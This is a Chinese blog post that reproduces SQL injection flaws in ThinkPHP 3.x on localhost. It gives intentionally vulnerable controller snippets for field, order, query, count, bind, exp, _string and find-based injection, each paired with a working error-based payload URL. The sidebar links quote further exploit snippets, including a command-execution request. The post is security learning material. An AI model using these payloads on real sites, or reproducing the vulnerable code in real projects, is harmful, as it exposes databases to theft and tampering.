基于tp3的sql注入漏洞的复现

最新推荐文章于 2024-08-11 21:50:57 发布
最新推荐文章于 2024-08-11 21:50:57 发布
阅读量2.5k 收藏 2
点赞数
分类专栏: 漏洞利用 文章标签: 基于tp3的sql注入漏洞的复现
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/92164201
版权

开发失误情况下的产生的SQL注入

1.field注入

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function fieldsql(){
        $table_name = I('GET.id') ? I('GET.id') : 1;
        $test = M('users')->field($table_name)->select();
        var_dump($test);
    }
}

payload:http://127.0.0.1/index.php/Home/Index/fieldsql?id=username%20from%20users%20where%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))%20--%20a

这里有个局限性就是需要知道字段的名字才能进行注入 这次我字段的名字是username

所以大家进行注入的时候可以搭配日志进行注入 在日志里面有相关的表和字段提供给我们进行注入~

剩下的
order注入 跟上面的操作一样

payload: http://127.0.0.1/index.php/Home/Index/fieldsql?id=username%20and%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))--%20a

comment注入 这里的注入我们需要先闭合前面的/*然后再进行注入再闭合后面的*/

payload : http://127.0.0.1/index.php/Home/Index/fieldsql?id=*/where%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))--%20a/*

group注入 注入的话 我们需要先用逗号进行分割 然后相同的操作进行注入

payload:http://127.0.0.1/index.php/Home/Index/fieldsql?id=username%20and%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))--%20a

having注入

payload:http://127.0.0.1/index.php/Home/Index/fieldsql?id=username%20and%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))--%20a

使用原生还不过滤的情况 query注入

    public function querysql(){
    	$id = I('GET.id') ? I('GET.id') : 1;
    	$test = M()->query('select * from users where id = ' . $id);
    	var_dump($test);
    	
    }

这个肯定都知道 M方法直接继承父类的操作 用query进行原生查询 拼接字符串 直接game over

payload:http://127.0.0.1/index.php/Home/Index/querysql?id=123%20and%20(extractvalue%20(1,concat(0x7e,(SELECT%20USER()),%200x7e)))--%20a

query和execute类似 都一样

统计查询外部可控制时造成的注入( Count,Max,Min,Avg,Sum )

    public function info(){
    	$test = I('test') ? I('test') : 1;
    	M('users') -> count($test);

    }

payload:http://127.0.0.1/index.php/Home/Index/info?test=1)%20from%20users%20where%20updatexml(1,concat(0x7e,(select%20user())),0)%20--%20a

其他的其实都差不多 只要开启了调试我们都可以根据其中的代码进行注入

即使使用了I函数也是不讲道理直接日穿型

实例代码

public function zxczxczxc(){
    $map['id'] = I('GET.id') ? I('GET.id') : 1;
    $data['username'] = 1;
    $c = M('users')->where($map)->save($data);
    var_dump($c);
}

payload:http://127.0.0.1/index.php/Home/Index/zxczxczxc?id[0]=bind&id[1]=0%20and%20updatexml(1,concat(0x7e,(select%20user())),0)

setField注入 跟上面差不多 就是用的是setField方法
payload:http://127.0.0.1/index.php/Home/Index/zxczxczxc?id[0]=bind&id[1]=0%20and%20updatexml(1,concat(0x7e,(select%20user())),0)

基本上使用了 exp的注入
实例代码:

public function test2(){
    $id = I('get.id');
    $map['id'] = array('exp',$id);
    $data = M('users')->where($map)->select();
    var_dump($data);
}

payload:http://127.0.0.1/index.php/Home/Index/test2?id=%3D1%20and%20updatexml(1,concat(0x7e,(select%20user())),0)

实例代码

public function test5(){
    $map['id'] = $_GET['id'];
    $data = M('users')->where($map)->select();
    var_dump($data);

}

payload:http://127.0.0.1/index.php/Home/Index/test5?id[0]=exp&id[1]=%20In%20(2)%20and%20updatexml(1,concat(0x7e,(select%20user())),0)

使用组合查询时的注入方式1 _string注入

实例代码:

    public function sqltetete(){
        $map['id'] = 2;
        $map['_string'] = I('get.test');
        M('users')->where($map)->select();
        
    }

payload:http://127.0.0.1/index.php/Home/Index/sqltetete?test=updatexml(1,concat(0x7e,(select%20user())),0)

0day thinkphp3.2 find/select/delete注入
实例代码

    public function asdasd(){
        $data = M('users')->find(I('get.test'));
        var_dump($data);

    }

payload:http://127.0.0.1/index.php/Home/Index/asdasd?test[where]=updatexml(1,concat(0x7e,(select%20user())),0)

来源:https://xz.aliyun.com/t/2630#toc-23

小鱼儿waha
关注
专栏目录
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露
qq_51577576的博客
09-29 1706
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 Thinkphp5X设计缺陷导致泄漏数据库账户密码
[ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞(CVE-2014-3704)
qq_51577576的博客
02-16 1433
[ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞(CVE-2014-3704) Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。
tp中如何防止mysql注入_thinkphp如何防止sql注入xss攻击
weixin_42327688的博客
01-19 1688
SQL注入简介SQL 注入漏洞(SQL Injection)是 Web 开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。而造成 SQL 注入的原因是因为程序没有有效的转义过滤用户的输入,使攻击者成功的向服务器提交恶意的 SQL 查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一...
任意文件上传漏洞(技术栈php+TP3.2)
weixin_44783781的博客
12-18 1187
一、漏洞描述 文件上传漏洞通常由于网站对用户上传的文件未经过校验或者校验不严,导致用 户可以上传任意格式、内容的文件,并可以访问到该文件。恶意攻击者可以利用 这个漏洞,上传可以被服务端解析的木马病毒,导致服务器的权限被恶意攻击者 获取。对网站造成极大的危害。 二、问题 3、解决过程 原先的代码如下:(主要是以后缀名来断定文件类型的) public function uploadResume() { $config = array( 'maxSize
sql注入-常见注入方法复现
dragon的博客
08-06 884
报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。是一种页面响应形式。响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面报错注入存在基础:后台对于输入输出的合理性没有做检查。
5种方法防止 jsp被sql注入
收集盒 Book box
09-22 6632
一、 SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。 ===========================================
thinkphp漏洞之sql漏洞
最新发布
banliyaoguai的博客
08-11 584
上面下载相应版本(下图中展示的5.0.15版本),下载think文件,下载framework文件,然后将framework文件修改名字为thinkphp,然后将修改后的framework放在think文件下,然后将think放在网站目录下,然后就可以打开了。parseArrayData拼接的值,这里是将你的注入语句用^与后面的('0(1)')进行拼接,或者使用|拼接也可以,这样的目的是为了mysql语法正确,这里对于后面的语句来说不重要,因为走到update的时候已经报错了。然后就会执行,报错出现注入。
常见的方法:防止PHP中的SQL注入
五六碗瓶
12-23 905
2.对用户输入进行过滤和验证:在执行SQL查询之前,对用户提供的输入进行严格的验证和过滤。1.使用预处理语句:使用PDO(PHP Data Objects)或MySQLi等库,可以使用绑定参数或占位符的方式处理SQL查询。3.限制数据库用户权限:为数据库用户分配最小的权限,确保他们只能执行必需的操作,并限制他们对敏感数据的访问。4.避免动态拼接SQL语句:避免直接将用户提供的数据拼接到SQL查询中。5.更新PHP和数据库版本:始终使用最新版本的PHP和数据库软件,以便获得最新的安全补丁和更新。
ThinkPHP_3.1.3 SQL注入漏洞复现
weixin_44611282的博客
05-22 8815
首先在网上下载对应的压缩包。 漏洞位于ThinkPHP/Lib/Core/Model.class.php 文件的parseSql函数 将这一条修复语句注释后开始一步步复现 在ThinkPHP目录下创建app文件夹后创建index.php 访问相应页面,显示这个则说明成功。 成功后app文件夹下会生成工程文件 然后开始配置数据库(在app/conf/config.php下配置) <?php return array( //'配置项'=>'配置值' // 添加数据库配置信息 'DB_TYPE
漏洞复现—ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1502
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
weixin_51387754的博客
12-30 4894
漏洞简介 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 模块:thinkphp 所有的主入口文件默认访问index控制器   方法:thinkphp 所有的控制器默认执行index动作   构造:http://IP/index.php(或者其它应用入口文件)?s=/模块/控制器/操作/[参数名/参数值…] 原理:控制了i
Getshell 网站漏洞批量检测工具破解后使用教程
07-26
Getshell网站漏洞批量检测工具破解后使用教程,运行软件,等待大概 3分钟左右软件才会启动。
116 thinkphp 3.1 sql注入
fancivez的专栏
12-12 2791
http://www.wooyun.org/bugs/wooyun-2010-086737 简要描述: ThinkPHP框架本身缺陷导致SQL注入漏洞,基本影响所有使用ThinkPHP开发的应用,包括thinksns、onethink等,这里以thinkphp自家的OneThink为例。 这个猛料,希望能加精呀~ 详细说明: 很多人天真的以为,使用了框架提供的数据
thinkPHP3.2.3中sql注入漏洞
XINO
05-26 1967
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 首先配置一下数据库 相对于TP5,可以先看下框架的特定函数 thinkphp3内置了很多大写函数 A 快速实例化Action类库 B 执行行为类 C 配置参数存取方法 D 快速实例化Model类库 F 快速简单文本数据存取方法 I 获取系统输⼊变(与tp5input方法类似) L 语言参数存取方法 M 快速高性能实例化模型 R 快速远程调用Action类方法 S 快速缓存存取方法 U URL动态生成和重定向方法 W 快速Widget输
updatexml mysql_MYSQL updatexml报错注入
weixin_42311000的博客
01-19 1047
updatexml()函数updataxml()函数用法UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,Str...
实战Src对ruoyi框架管理系统漏洞复现
zkaqlaoniao的博客
12-18 5126
在挖src的时候,搜搜有没有后台弱口令能进去的:发现一个弱口令进去后:【这个蓝色的草丛居然堪比算是ruoyi的指纹】看这界面,是不是很像ruoyi插件一看:前端vue.js加上登录的cookie rememberMe:【登录失败时bp抓包相应包有remeberMe=delete】得知登录为shiro框架八九不离十后台就是ruoyi框架的管理系统了。
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5254
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
SQL注入、XSS与CSRF漏洞复现及分析
Kali与编程
04-14 425
总结起来,SQL注入、XSS和CSRF都是常见且危害严重的Web漏洞。理解这些漏洞复现方法和原理有助于我们更好地制定针对性的安全策略,并通过实施有效的防御措施来保护Web应用不受此类攻击的侵害。攻击者可以在自己的网站上创建类似的表单,诱使用户在其不知情的情况下触发此表单提交,完成转账。当其他用户浏览包含此评论的页面时,会弹出警告框,表明存在XSS漏洞SQL注入、XSS与CSRF漏洞复现及分析。二、跨站脚本攻击(XSS)漏洞复现与分析。一、SQL注入漏洞复现与分析。
漏洞复现】常见框架漏洞复现 合集
qq_48368964的博客
08-07 1233
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值